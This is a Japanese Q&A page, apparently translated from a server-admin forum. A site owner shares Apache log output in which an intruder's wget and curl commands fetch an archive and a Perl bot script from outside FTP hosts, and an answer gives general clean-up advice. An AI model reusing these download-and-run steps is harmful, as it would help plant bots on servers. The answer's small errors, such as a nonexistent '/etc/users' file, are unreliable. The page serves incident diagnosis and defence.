Apache ログに、危険そうな、認識できないものが含まれている

tag-icon tag-icon apache-http-server
Apache ログに、危険そうな、認識できないものが含まれている

帯域幅を超えた後、サイト ホストが私のアカウントを無効にしました。サイトが小さいので、これは奇妙なことでした。ログを調べ始めたところ、自分が持っていない共通のエンドポイントを見つけようとする試みを見るのは慣れているものの、非常に厄介なことがいくつかありました。まず、次の点です。

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                             Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 77597  100 77597    0     0   184k      0 --:--:-- --:--:-- --:--:--  246k
--2019-10-13 11:49:21--  ftp://matei:*password*@tyger.ignorelist.com/tst.tgz
       => `tst.tgz'
Resolving tyger.ignorelist.com... 86.121.73.246
Connecting to tyger.ignorelist.com|86.121.73.246|:21... connected.
Logging in as matei ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> SIZE tst.tgz ... 21765
==> PASV ... done.    ==> RETR tst.tgz ... done.

 0K .......... .......... .                                53.3K=0.4s

2019-10-13 11:49:23 (53.3 KB/s) - `tst.tgz' saved [21765]

そして

こんなものは見たことがありません。何かに乗っ取られたようです。どうすれば直りますか?

curl: (7) couldn't connect to host

curl: (7) couldn't connect to host
Can't open perl script "bot.pl": No such file or directory
Can't open perl script "bot.pl": No such file or directory
sh: GET: command not found
sh: GET: command not found
--2019-10-15 22:14:04--  ftp://94.177.240.65/bot.pl
       => `bot.pl'
Connecting to 94.177.240.65:21... --2019-10-15 22:14:04--  
ftp://94.177.240.65/bot.pl
       => `bot.pl'
Connecting to 94.177.240.65:21... failed: Connection refused.
failed: Connection refused.

答え1

Linux マシンが Apache サービスを通じて侵害されたようです。

どうすれば修正できますか?

潜在的な侵害がないかシステム全体を調査する必要があるため、簡単な修正方法はありません。

一般的な提案をいくつか紹介します。

  • Apache を最新バージョンにアップグレードします (経由apt-get)。
  • すべてのパッケージをアップグレードします ( sudo apt-get update)。
  • 使用中のすべての Web CMS/フレームワークをアップグレードします (既知の脆弱性がないか確認します)。
  • システム全体をスキャンして、既存の脆弱性を探します (マルウェア スキャナー、ウイルス対策など)。
  • すべての Web サイトをスキャンして、マルウェアやシェルコード ファイルがないかどうかを確認します。

  • PHP を使用している場合:

  • 共有ホスティングを使用している場合は、ホスティング会社にお問い合わせください。
  • システムに予期しないユーザー ( /etc/users) やファイル ( など/tmp) がないか確認してください。

  • 侵害を確認した場合:

    • 公開されているすべての資格情報(アクセス キー、パスワードなど)を変更します。
    • 必要になった場合に備えて、すべての証拠(IP アドレス、ログ、感染した/マルウェア ファイル)を保存します。
  • システムにパッチを適用した後も、さらに疑わしいアクティビティがないかログを監視し続けます。

上記に自信がない場合は、その専門のIT会社にお問い合わせください。

参照:

関連情報